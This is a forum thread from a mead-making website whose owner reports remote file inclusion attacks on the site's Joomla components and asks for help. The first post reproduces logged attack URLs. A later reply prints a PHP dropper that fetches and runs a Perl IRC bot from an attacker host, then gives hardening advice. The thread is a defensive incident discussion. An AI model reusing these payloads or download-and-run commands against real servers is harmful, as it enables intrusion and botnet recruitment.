Results 1 to 7 of 7

Thread: Gotmead.com being exploited by IRC hacks - any suggestions?

  1. #1
    Join Date
    Apr 1996
    Location
    Youngsville, NC
    Posts
    1,610

    Default Gotmead.com being exploited by IRC hacks - any suggestions?

    Gang, I'm working on the search issue, but my host just informed me that we're being exploited by IRC hackers, to wit:

    Code:
    /component/option,com_pccookbook/page,viewrecipe/recipe_id,119/mead-research/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /component/option,com_pccookbook/page,viewrecipe/cat_id,1/recipe_id,1/mead-research/component/option,com_smf/Itemid,183/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
    //components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    //components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /index.php?option=com_smf&Itemid=397&action=login//modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    //modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
    /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aespeechanddrama.org/components/com_smf/echo.txt??
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

    Vicky - harried and typing as fast as I can
    Wassail!

    Vicky Rowe
    Owner & Webmistress, Gotmead.com
    Executive Director, American Mead Makers Association
    http://www.mead-makers.org
    Making Mead since 1995

  2. Default Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    a quick google on the problem i found out theres a security leak in the Joomla <-> SMF bridge which can be exploited by iRC

    i dont know the writers/programmers of the bridge, but perhaps check their website for an update

  3. Default Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Quote Originally Posted by Vicky - GM Webmistress

    If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

    Vicky - harried and typing as fast as I can
    a tip i got (had about the same experiences on my community and GM has gone through..)
    went from an opensource forum to a commercial one.

    i never ever regretted the day i decided to convert my forums to vBulletin. it's well worth the money, and very easy to add some mods (which are all checked by vBulleting developers) that do the same as GM has now (articles + forum)

    theyre are two options in that whic h i can recommend:
    either vBAdvanced (for portal and articles) + vBulletin
    or vBAdvanced (for portal) + vBulletin + mediawiki (for articles) (i prefer this one.. see my site as an example: www.birthright.net )


  4. #4

    Default Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Vicky,

    I'm no expert on XSS, nor am I familiar with SMF. But looking at the logs you posted, it appears that the poor script kiddie is running a script that's just brute force attempting various combinations in the hope that one will work.

    Some of the tools linked to in the logs are :
    http://www.freewebtown.com/vampirehack/Strings.txt ( just as it sounds, a list of strings indicating vulnerable installations)
    http://www.thomashamilton.net/id.txt (poor welding company is being used to host this)
    http://aespeechanddrama.org/components/com_smf/echo.txt (this just contains a php command to echo "1122548")
    http://www.the-esao.com/imag/stringa.txt (php script to check for permissions to execute the exec(),shell_exec(),system() or passthrough() functions, grabbing the current disk usage)
    http://paginas.terra.com.br/lazer/lunero/id.txt (another php script to check the OS and permissions to execute commands. This script attempts to play around with cookies. It determines the username that apache is running as, as well as which kernel release the webserver is running. It then sets cookies with that data. This is very useful if you're going to try to completely take over the machine.)

    Sprinkled throughout are attempted fopens to http://someone.co.il/onfokh.gif?
    No surprise here, but there's not an image at that url... instead there is a *gasp* php script that contains the following code

    Code:
    <?
    passthru('cd /var/tmp;wget http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;curl -O http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;lwp-download http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;lynfile.txt -source http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;fetch http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;GET http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    ?>
    :)
    So they're trying to get the webserver to download and execute the perl script at http://someone.co.il/someone.txt, removing it afterwards.

    Now, a lot of that perl script is in portuguese.... But they set up the script to join channel ' ##ddos3## ' on the server internetron.bsd.st.

    My brain is starting to bleed from all the portuguese perl (and I thought perl couldn't get any worse!) But I see a sub in there for DCC file transfers. Then again this looks like a modified DDos script, so that may be left over. At any rate though, I'm not going to finish reading it... whatever it's doing it won't be good.

    My advice in addition to blocking the IP address block of the originating attack, I'd block internetron.bsd.st ( 209.63.212.17 ) as well as irc.gigachat.net ( 66.252.24.10 ) (gigachat.net is mentioned in the comments of the perl script, though I didn't see it used).

    If your host is willing (and it won't break anything), I'd also disable shell_exec, passthru, proc_open, proc_close, proc_get-status, proc_nice, proc_terminate, exec and system in the php.ini. This may very well not be feasible, at the very least allow-url-fopen should be disabled.

    Just a guess, but if he had broken in he probably would have left his nice little card that he spent so much time on. Following that we'd probably be constantly bombarded by nasty posts throughout the forum and admins might find themselves locked out.


    Hope this helps in some way.

    Meadmaker since 2006. As of Aug, 2012 ~ 15 batches. Mostly meads and ciders, only a few beers. Just now getting to know enough to be dangerous.

    Double check any advice that comes out of my mouth (err, hands).

  5. #5
    Join Date
    Dec 2004
    Location
    The OC
    Posts
    7,874

    Default Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Thanks for dangerous journey through the Portugese perl!

    We've got most of what you pointed out done at the php.ini level and the bridge hacks have been also been shut down. There are a couple of things that we're working with our new host on, and we'll be sure to see about the additional php.ini suggestions you made.

    thanks so much for the analysis,

    Oskaar
    Is it tasty . . . precious?

  6. #6

    Default Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Yeah I was pretty late on the reply. On the bright side, it was an interesting rabbit hole to play around in.


    Glad you guys have got it covered!



    Cheers
    Meadmaker since 2006. As of Aug, 2012 ~ 15 batches. Mostly meads and ciders, only a few beers. Just now getting to know enough to be dangerous.

    Double check any advice that comes out of my mouth (err, hands).

  7. #7
    Join Date
    Apr 1996
    Location
    Youngsville, NC
    Posts
    1,610

    Default Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Yeah, thanks! I added the additional strings to the htaccess file, and had already done the others to the php.ini.
    Wassail!

    Vicky Rowe
    Owner & Webmistress, Gotmead.com
    Executive Director, American Mead Makers Association
    http://www.mead-makers.org
    Making Mead since 1995

Similar Threads

  1. Replies: 9
    Last Post: 11-09-2006, 09:14 AM
  2. Suggestions?
    By Ibiduin in forum Mead NewBees - Post your Questions Here
    Replies: 4
    Last Post: 08-31-2005, 04:08 PM
  3. Open for suggestions...
    By Lagerman64 in forum Archives
    Replies: 2
    Last Post: 09-04-2004, 11:23 PM
  4. Feedback and suggestions
    By ThistyViking in forum Archives
    Replies: 1
    Last Post: 05-30-2004, 06:58 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •